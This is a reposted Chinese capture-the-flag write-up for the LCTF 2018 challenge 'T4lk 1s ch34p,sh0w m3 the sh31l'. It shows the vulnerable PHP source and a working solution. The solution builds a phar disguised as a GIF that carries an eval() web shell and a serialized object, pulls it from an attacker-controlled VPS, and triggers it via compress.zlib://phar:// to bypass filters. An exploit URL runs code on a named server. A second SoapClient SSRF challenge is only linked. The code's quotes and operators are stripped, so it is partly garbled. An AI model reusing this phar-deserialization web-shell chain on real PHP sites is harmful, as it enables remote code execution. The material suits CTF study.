1、T4lk 1s ch34p,sh0w m3 the sh31l

代码如下

 ?php$SECRET ../read_secret $SANDBOX ../data/ . md5($SECRET. $_SERVER[ REMOTE_ADDR ]);$FILEBOX ../file/ . md5( K0rz3n . $_SERVER[ REMOTE_ADDR ]); mkdir($SANDBOX);mkdir($FILEBOX);echo $FILEBOX ;if (!isset($_COOKIE[ session-data ])) { $data serialize(new User($SANDBOX)); $hmac hash_hmac( md5 , $data, $SECRET); setcookie( session-data , sprintf( %s-----%s , $data, $hmac)); }class User { public $avatar; function __construct($path) { $this- avatar $path; }}class K0rz3n_secret_flag { protected $file_path; function __destruct(){ if(preg_match( /(log|etc|session|proc|read_secret|history|class)/i , $this- file_path)){ die( Sorry Sorry Sorry ); } include_once($this- file_path); }}function check_session() { global $SECRET; $data $_COOKIE[ session-data ]; list($data, $hmac) explode( ----- , $data, 2); if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){ die( Bye ); } if ( !hash_equals(hash_hmac( md5 , $data, $SECRET), $hmac) ){ die( Bye Bye ); } $data unserialize($data); if ( !isset($data- avatar) ){ die( Bye Bye Bye ); } return $data- avatar;//返回上传路径 }function upload($path) { if(isset($_GET[ url ])){ if(preg_match( /^(http|https).*/i , $_GET[ url ])){ $data file_get_contents($_GET[ url ] . /avatar.gif ); if (substr($data, 0, 6) ! GIF89a ){ die( Fuck off ); } //?m upload url http://vps/avatar.gif file_put_contents($path . /avatar.gif , $data); die( Upload OK ); }else{ die( Hacker ); } }else{ die( Miss the URL~~ ); }}function show($path) { if ( !is_dir($path) || !file_exists($path . /avatar.gif )) { $path /var/www ; } header( Content-Type: image/gif ); die(file_get_contents($path . /avatar.gif )); }function check($path){ if(isset($_GET[ c ])){ if(preg_match( /^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\\\\s)*|(.|\\\\s)*(file)(.|\\\\s)*/i ,$_GET[ c ])){ die( Hacker Hacker Hacker ); }else{ $file_path $_GET[ c ]; list($width, $height, $type) getimagesize($file_path); die( Width is . $width. px br . Height is . $height. px br ); } }else{ list($width, $height, $type) getimagesize($path. /avatar.gif ); die( Width is . $width. px br . Height is . $height. px br ); }}function move($source_path,$dest_name){ global $FILEBOX; $dest_path $FILEBOX . / . $dest_name; if(preg_match( /(log|etc|session|proc|root|secret|www|history|file|\\.\\.|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i ,$source_path)){ die( Hacker Hacker Hacker ); }else{ if(copy($source_path,$dest_path)){ die( Successful copy ); }else{ die( Copy failed ); } }}$mode $_GET[ m ];if ($mode upload ){ upload(check_session());}else if ($mode show ){ show(check_session());}else if ($mode check ){ check(check_session());}else if($mode move ){ move($_GET[ source ],$_GET[ dest ]);}else{ highlight_file(__FILE__); }

1、上传恶意文件 反序列化的时候包含上传的文件 注意生成的avatar.gif不仅可以反序列化覆盖上传路径$file_path 也可以通过setStub向恶意文件中写入php代码 文件包含

?m upload url http://vps/avatar.gif

 ?phpclass K0rz3n_secret_flag { protected $file_path /var/www/data/67bf5ff3cfa1cdd00f700328698c2adb/avatar.gif ; function __destruct(){ if(preg_match( /(log|etc|session|proc|read_secret|history|class)/i , $this- file_path)){ die( Sorry Sorry Sorry ); } include_once($this- file_path); } }$a new K0rz3n_secret_flag();$p new Phar( ./1.phar , 0);$p- startBuffering();$p- setStub( GIF89a ?php echo 1;eval($_GET[ a ? . ?php __HALT_COMPILER(); ? . );$p- setMetadata($a);$p- addFromString( 1.txt , text );$p- stopBuffering();rename( ./1.phar , avatar.gif 

生成的恶意文件

2、check的时候触发反序列化。通过compress.zlib://phar绕过正则。参考链接 https://blog.zsxsoft.com/post/38

 http://212.64.7.171/LCTF.php?m check c compress.zlib://phar:///var/www/data/dccb75e38fe3fc2c70fd169f263e6d37/avatar.gif a phpinfo();

 2、bestphp s revenge

通过Soap类进行反序列化 进行ssrf.具体参考 https://xz.aliyun.com/t/3339#toc-3 https://xz.aliyun.com/t/3341#toc-22 https://www.anquanke.com/post/id/164569

 参考链接

https://xz.aliyun.com/t/3341#toc-8

https://xz.aliyun.com/t/3339#toc-4

https://xz.aliyun.com/t/3340#toc-3

http://www.k0rz3n.com/2018/11/19/LCTF%202018%20T4lk%201s%20ch34p,sh0w%20m3%20the%20sh31l%20%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/

转载于:https://www.cnblogs.com/afanti/p/9987094.html